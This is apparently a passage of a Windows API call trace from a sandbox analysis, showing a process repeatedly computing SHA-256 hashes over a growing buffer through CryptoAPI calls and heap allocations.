	[0192.601] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.602] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.602] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0192.602] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.602] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302788
	[0192.602] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302788, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302788, pdwDataLen=0x1283b0) returned 1
	[0192.602] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.602] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.602] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.603] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.603] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0192.603] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.603] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23027b0
	[0192.603] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23027b0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23027b0, pdwDataLen=0x1283b0) returned 1
	[0192.603] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.603] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.603] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.603] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.603] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0192.603] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.603] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23027d8
	[0192.604] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23027d8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23027d8, pdwDataLen=0x1283b0) returned 1
	[0192.604] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.604] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.604] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.604] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.604] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0192.604] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.604] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302800
	[0192.604] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302800, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302800, pdwDataLen=0x1283b0) returned 1
	[0192.604] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.604] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.604] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.605] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.605] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0192.605] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.605] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302828
	[0192.605] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302828, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302828, pdwDataLen=0x1283b0) returned 1
	[0192.605] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.605] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.605] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.606] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.606] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0192.606] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.606] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302850
	[0192.606] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302850, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302850, pdwDataLen=0x1283b0) returned 1
	[0192.606] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.606] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.606] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.606] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.607] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0192.607] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302878
	[0192.607] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302878, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302878, pdwDataLen=0x1283b0) returned 1
	[0192.607] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.607] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.607] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.607] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.607] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0192.607] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.607] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23028a0
	[0192.607] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23028a0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23028a0, pdwDataLen=0x1283b0) returned 1
	[0192.607] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.607] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.607] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.608] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.608] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0192.608] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.608] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23028c8
	[0192.608] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23028c8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23028c8, pdwDataLen=0x1283b0) returned 1
	[0192.608] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.608] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.608] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.609] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.609] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0192.609] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.609] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23028f0
	[0192.609] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23028f0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23028f0, pdwDataLen=0x1283b0) returned 1
	[0192.609] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.609] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.609] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.610] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.610] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0192.610] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302918
	[0192.610] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302918, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302918, pdwDataLen=0x1283b0) returned 1
	[0192.610] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.610] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.610] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.610] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.610] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0192.610] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.610] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302940
	[0192.611] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302940, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302940, pdwDataLen=0x1283b0) returned 1
	[0192.611] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.611] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.611] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.611] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.611] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3a0, dwFlags=0x0) returned 1
	[0192.611] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.611] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302968
	[0192.611] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302968, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302968, pdwDataLen=0x1283b0) returned 1
	[0192.611] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.611] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.611] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.612] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.612] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x3c0, dwFlags=0x0) returned 1
	[0192.612] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.612] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302990
	[0192.612] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302990, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302990, pdwDataLen=0x1283b0) returned 1
	[0192.612] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.612] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.612] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.613] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.613] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x3e0, dwFlags=0x0) returned 1
	[0192.613] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.613] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23029b8
	[0192.613] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23029b8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23029b8, pdwDataLen=0x1283b0) returned 1
	[0192.613] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.613] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.613] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.614] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.614] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x400, dwFlags=0x0) returned 1
	[0192.614] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.614] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23029e0
	[0192.614] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23029e0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23029e0, pdwDataLen=0x1283b0) returned 1
	[0192.614] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.614] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.614] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.615] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.615] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x420, dwFlags=0x0) returned 1
	[0192.615] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.615] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302a08
	[0192.615] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302a08, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302a08, pdwDataLen=0x1283b0) returned 1
	[0192.615] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.615] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.615] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.616] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.616] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x440, dwFlags=0x0) returned 1
	[0192.616] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302a30
	[0192.616] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302a30, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302a30, pdwDataLen=0x1283b0) returned 1
	[0192.616] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.616] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.616] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.617] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.617] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x460, dwFlags=0x0) returned 1
	[0192.617] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.617] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302a58
	[0192.617] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302a58, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302a58, pdwDataLen=0x1283b0) returned 1
	[0192.617] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.617] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.617] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.617] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.617] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x480, dwFlags=0x0) returned 1
	[0192.617] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302a80
	[0192.618] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302a80, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302a80, pdwDataLen=0x1283b0) returned 1
	[0192.618] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.618] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.618] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.618] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.618] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4a0, dwFlags=0x0) returned 1
	[0192.618] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.618] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302aa8
	[0192.618] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302aa8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302aa8, pdwDataLen=0x1283b0) returned 1
	[0192.618] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.618] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.618] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.619] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.619] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x4c0, dwFlags=0x0) returned 1
	[0192.619] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.619] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302ad0
	[0192.619] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302ad0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302ad0, pdwDataLen=0x1283b0) returned 1
	[0192.619] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.619] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.619] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.620] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.620] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x4e0, dwFlags=0x0) returned 1
	[0192.620] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.620] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302af8
	[0192.620] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302af8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302af8, pdwDataLen=0x1283b0) returned 1
	[0192.620] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.620] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.620] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.621] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.621] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x500, dwFlags=0x0) returned 1
	[0192.621] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.621] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302b20
	[0192.621] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2302b20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302b20, pdwDataLen=0x1283b0) returned 1
	[0192.621] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0192.621] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.621] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0192.621] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0192.621] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x520, dwFlags=0x0) returned 1
	[0192.621] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0192.622] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2302b48
	[0192.622] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2302b48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2302b48, pdwDataLen=0x1283b0) returned 1
	[0192.622] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0192.622] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0192.622] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
